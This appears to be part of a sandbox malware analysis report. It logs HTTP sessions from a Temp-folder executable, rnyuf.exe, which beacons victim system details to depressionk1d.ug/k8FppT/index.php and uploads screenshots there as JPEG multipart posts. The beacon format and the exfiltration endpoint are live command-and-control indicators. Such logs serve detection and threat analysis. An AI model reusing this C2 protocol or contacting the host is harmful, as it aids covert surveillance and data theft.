                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          125192.168.2.449910178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:45.092194080 CET6713OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:45.118091106 CET6713INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:45 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          126192.168.2.449911178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:45.261550903 CET6714OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:45.286550045 CET6714INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:45 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          127192.168.2.449912178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:45.286794901 CET6715OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----2379f4103dba772a786c03df93bf021f
                          Host: depressionk1d.ug
                          Content-Length: 111558
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:45.287026882 CET6715OUTData Raw: 2d 2d 2d 2d 2d 2d 32 33 37 39 66 34 31 30 33 64 62 61 37 37 32 61 37 38 36 63 30 33 64 66 39 33 62 66 30 32 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------2379f4103dba772a786c03df93bf021fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:45.287492990 CET6725OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:45.287743092 CET6728OUTData Raw: 45 14 50 20 a2 8a 28 00 a2 8a 28 00 a2 8a 5e 68 00 e6 8a 39 a2 98 05 14 51 40 82 8a 05 06 80 0a e9 be 1e ff 00 c8 fd a3 ff 00 d7 63 ff 00 a0 9a e6 6b a6 f8 7b ff 00 23 f6 8f ff 00 5d 8f fe 82 6a 27 f0 b2 a1 f1 23 e9 6a 28 aa cd 6b 33 3b 30 bf b8
                          Data Ascii: EP ((^h9Q@ck{#]j'#j(k3;0PNBET$c($c(SFFtUOOA?"FtUOOA?"OA?"d7?Ed7?
                          Nov 12, 2021 22:23:45.310164928 CET6733OUTData Raw: 59 46 94 c7 b4 0c 67 23 83 9c fa 8c 71 9a e7 0b d7 6e 1e 75 f8 40 5b cb 53 34 f3 f9 6a 73 f3 1b 58 e4 dc 4e 3d 04 af 8f c6 b8 0d f5 a4 e0 95 ad d8 e2 c2 e2 25 3e 7e 67 7b 49 a4 4c 5e b0 35 93 9b e5 ff 00 ae 63 f9 9a d8 df 58 ba a9 cd e2 ff 00 d7
                          Data Ascii: YFg#qnu@[S4jsXN=%>~g{IL^5cX1ve,k?:(>p:IEjYNe|::n}ko5?#q-]j/O>bhJ|kW|_A~-
                          Nov 12, 2021 22:23:45.310209036 CET6738OUTData Raw: f4 3d 53 c3 b7 16 56 5b c9 90 a9 62 ec 99 c0 20 e0 05 27 27 20 57 81 55 86 b2 bb 59 27 8d ad 27 0f 6e bb e6 53 19 cc 4b 90 32 c3 1c 0c 91 c9 f5 15 14 90 cb 10 8c cb 13 a0 95 37 c6 59 48 de b9 23 23 d4 64 11 9f 63 5b 51 a2 a9 b6 ef 76 ff 00 af f3
                          Data Ascii: =SV[b '' WUY''nSK27YH##dc[Qv0b#N0n]!sIK]sES(EP(%/4Q@%%EPZ8VVYc[;h$NsZ[G7Xtm20;>{W!vWvL+#7L
                          Nov 12, 2021 22:23:45.310229063 CET6741OUTData Raw: 91 c7 02 c2 9c 00 c7 03 25 3d 07 73 5c 34 30 f3 ac da 87 45 7f 91 dd 52 a7 22 bd 9b f4 57 3b d9 24 48 a3 69 24 75 44 51 96 66 38 00 7b 9a 11 d2 48 d6 48 d9 5d 18 06 56 53 90 41 e8 45 79 ce b5 26 af 73 3b 69 f7 b7 ee d6 cb 83 20 01 41 2d e9 c0 15
                          Data Ascii: %=s\40ER"W;$Hi$uDQf8{HH]VSAEy&s;i A-h_C@p)T(EI^5$E+nUZ'lG6nvmh7aylgbDK]BoP8=3b\d4]JY'lrXn-^1 )
                          Nov 12, 2021 22:23:45.310370922 CET6747OUTData Raw: 58 e2 3e 03 7a 0f df 3d 7e 92 b8 78 8d ff 00 8e ae 25 95 6e e6 b1 d0 23 72 91 88 4e d9 2e 48 ea 49 ec 3f cf 5a 98 78 0b c3 6c cc 96 93 4d 0d d2 7f cb 48 6e 89 91 4f af 7f e5 59 ba 10 86 95 25 67 e4 af 6f 5d 50 d5 79 cf 5a 71 ba f3 76 bf a6 8c b7
                          Data Ascii: X>z=~x%n#rN.HI?ZxlMHnOY%go]PyZqvZ4#m2A|]FlV2Hm9AWF^:WWnP^W^J(_9.*h<i6EFNF@]o)Zw?k9~?S_Fx
                          Nov 12, 2021 22:23:45.310425997 CET6751OUTData Raw: cd d7 8a 35 bb cb bf b6 4b 35 98 bb 3e 66 e9 e2 b0 82 39 1f 7a 14 6d cc a8 0b 65 58 8e 73 d7 3d 69 fb 3a ba f7 f7 bf 1d be e1 ca a5 36 cd 69 ad 60 d2 bc 37 aa 6b 3a 74 10 4d 6d 2d c5 9c da 74 d7 36 e9 2e c8 dc 4e 1e 32 1c 10 4a b2 ed 61 c8 25 41
                          Data Ascii: 5K5>f9zmeXs=i:6i`7k:tMm-t6.N2Ja%AEyXDMOYE05V*[3Wv0kr0nziTo-q*e|U.oi7,u5mGLdLEXl&BUeEx5]%
                          Nov 12, 2021 22:23:45.310491085 CET6753OUTData Raw: 0a d6 8c a5 4e aa e5 d9 bb 3f eb b8 35 1a f8 79 d3 a9 af 22 6e 2f aa ee bd 1f 6e 8f 55 d6 fe 4b 4a 29 b8 a5 15 ec a3 e7 c7 8a 29 29 45 51 26 d7 83 ff 00 e4 77 f0 ff 00 fd 84 ad bf f4 6a d7 d5 17 7e 21 d2 ec 6e 9e da e6 eb 64 c9 8d cb e5 b1 c6 46
                          Data Ascii: N?5y"n/nUKJ)))EQ&wj~!ndF{C_+h54Bt"'jc_tH-#*??qbT*;p"YBRmtnVF D@A'Y5iij#x].dgH <{Uo\F6()u(Jt
                          Nov 12, 2021 22:23:45.333333969 CET6759OUTData Raw: 21 30 46 7f 86 90 da af 62 45 4f 8a 5c 52 e4 41 ed 19 58 da 1e cc 29 86 d9 c7 6c d5 ec 52 81 47 b2 41 ed 59 9f e5 b0 ea a6 8e 7d 2b 4b 14 6c 53 d5 01 a3 d9 76 0f 6a 67 52 8a be 6d e3 3f c2 45 34 da 2f 63 47 b3 61 ed 62 54 03 34 ec 54 e6 d1 bb 11
                          Data Ascii: !0FbEO\RAX)lRGAY}+KlSvjgRm?E4/cGabT4TH`{fV>tJ;iARP)LRMUXWZ)qLBSMRP)SbaF)RP:4(\3Fhf4V%5iAryISTCPK`5<=VOTKd=<5TOH)4
                          Nov 12, 2021 22:23:45.382317066 CET6829INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:45 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:23:45.392956972 CET6830OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:45.420675993 CET6830INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:45 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          128192.168.2.449913178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:45.568892002 CET6831OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:45.595460892 CET6831INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:45 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          129192.168.2.449914178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:45.935548067 CET6832OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:45.962323904 CET6832INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:45 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:23:46.025098085 CET6833OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:46.025178909 CET6833OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:46.025366068 CET6843OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:46.025491953 CET6846OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:46.047626972 CET6847INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:46 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:23:46.047808886 CET6853OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:46.047847986 CET6863OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:46.047898054 CET6868OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:46.047956944 CET6874OUTData Raw: 1d c8 50 67 31 ec 90 15 65 23 95 c0 3f 74 0e 46 7d eb 95 8f 52 bf 8a dd ed e3 bd b9 48 5d 76 bc 6b 2b 05 61 e8 46 70 45 74 47 0d 2b dd b2 25 88 8d ac 91 56 92 8a 2b b4 e4 14 51 45 14 c0 2b e9 3f 83 cc bf f0 85 6d c8 dc 26 04 8f 63 1a 7f 81 af 9b
                          Data Ascii: Pg1e#?tF}RH]vk+aFpEtG+%V+QE+?m&c+oK>\Xr;+c*G:5)vRK[_f}+/5KHlb}(z9rZa{6>(Ucw5<OAK')uU+/ts`
                          Nov 12, 2021 22:23:46.070529938 CET6895OUTData Raw: 83 14 62 81 45 30 b8 53 85 36 94 1a 04 28 eb 4e 1d e9 b4 b4 d0 85 a2 8a 5a 64 8b 8a 4c 52 81 4a 06 29 d8 06 e2 8a 53 49 40 20 a2 92 8a 40 14 b4 52 1a 00 5a 51 40 a2 98 0b 4b 49 4a 29 88 5a 33 49 45 08 43 b3 40 eb 40 a3 35 40 3a 8a 6e 68 14 13 61
                          Data Ascii: bE0S6(NZdLRJ)SI@ @RZQ@KIJ)Z3IEC@@5@:nhaii(0RRZJZhLS@C:)BSiEQ,uQNuQ#<*1OH<RMU:uM~itj-f8dvjM3N8h<8isLlJ8Pi.h0Pib@iA
                          Nov 12, 2021 22:23:46.070589066 CET6906OUTData Raw: a8 66 88 72 f5 a7 e6 9a 29 d5 0c d1 0f 53 c5 79 17 c4 f0 16 f2 c7 1f f3 cd ff 00 f4 2a f5 b1 d4 d7 91 fc 4e 3f e9 d6 3f f5 c9 bf f4 2a d2 87 c4 45 53 c7 5a 35 63 92 29 04 29 e9 52 62 94 57 2f 2a 3d 2e 66 33 ca 5e 3d a9 db 17 76 71 cd 2d 19 a7 64
                          Data Ascii: fr)Sy*N??*ESZ5c))RbW/*=.f3^=vq-dbhN!] @7n4Z9P(t0hVBJ!@sE93Ri)c<Dx*J)rc1(nqO ``PFFHD~D#KIF=*c4yIOvBx
                          Nov 12, 2021 22:23:46.070614100 CET6911OUTData Raw: 6a 64 f3 0c c5 2e 2a 50 86 94 25 04 f3 11 81 4f 02 9e 14 53 c0 5a 64 b9 11 85 a7 84 a7 82 a3 bd 1e 6a 0f e2 14 10 db 62 04 a7 04 a6 9b 98 87 f1 52 7d b6 31 d3 9a 77 42 e5 9b e8 4c 12 94 25 56 37 cb d8 53 7e da 4f 41 45 c3 d9 cc bd b7 14 a0 56 7f
                          Data Ascii: jd.*P%OSZdjbR}1wBL%V7S~OAEVD+RQVW1=w}ExURQa{"h[sFM7w9J~7xqBhh$\kc%5X5.w/YsFr-IM}b]\G


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          13192.168.2.449794178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:15.331141949 CET1974OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:15.331315994 CET1974OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:15.331679106 CET1984OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:15.331758976 CET1987OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
